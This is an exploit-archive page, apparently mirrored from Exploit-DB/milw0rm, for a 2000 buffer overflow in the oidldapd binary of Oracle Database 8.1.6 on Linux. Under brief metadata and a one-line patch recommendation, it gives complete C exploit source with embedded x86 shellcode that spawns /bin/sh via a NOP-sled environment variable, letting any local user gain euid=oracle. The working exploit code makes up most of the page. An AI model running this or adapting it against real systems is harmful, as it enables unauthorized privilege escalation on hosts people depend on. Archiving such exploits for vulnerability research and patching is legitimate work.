header-logo
Suggest Exploit
vendor:
Oracle Database
by:
milw0rm.com
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Oracle Database
Affected Version From: Oracle 8.1.6 (8ir2)
Affected Version To: Oracle 8.1.6 (8ir2)
Patch Exists: YES
Related CWE: N/A
CPE: a:oracle:oracle_database:8.1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2000

Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux

This exploit code is for oidldapd in Oracle 8.1.6 (8ir2) for Linux. It allows any user to gain euid=oracle by exploiting a buffer overflow vulnerability. The exploit code creates a buffer of 700 bytes and fills it with NOP instructions. It then copies the shellcode into the buffer and sets the environment variable EGG to the buffer. It then executes the oidldapd binary with the environment variable set.

Mitigation:

Apply the latest security patches from Oracle.
Source

Exploit-DB raw data:

/*
  Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux.
  I tested in RH 6.2 and 6.1. This code is a bullshit (i know
  please no comments about ;-)).

  If someone exports this to Sparc please tell me.

  synopsis: buffer overflow in oidldapd
    impact: any user gain euid=oracle.

  Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others.
*/

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET		13
#define DEFAULT_BUFFER_SIZE	700
#define NOP				0x90
#define ORACLE_HOME		"/usr/local/oracle/app/oracle/product/8.1.6"

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME);
  putenv(environ);
  sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME);
  system(binary);
}


// milw0rm.com [2000-11-16]

Navigation

Suggest Exploit

Services By CQR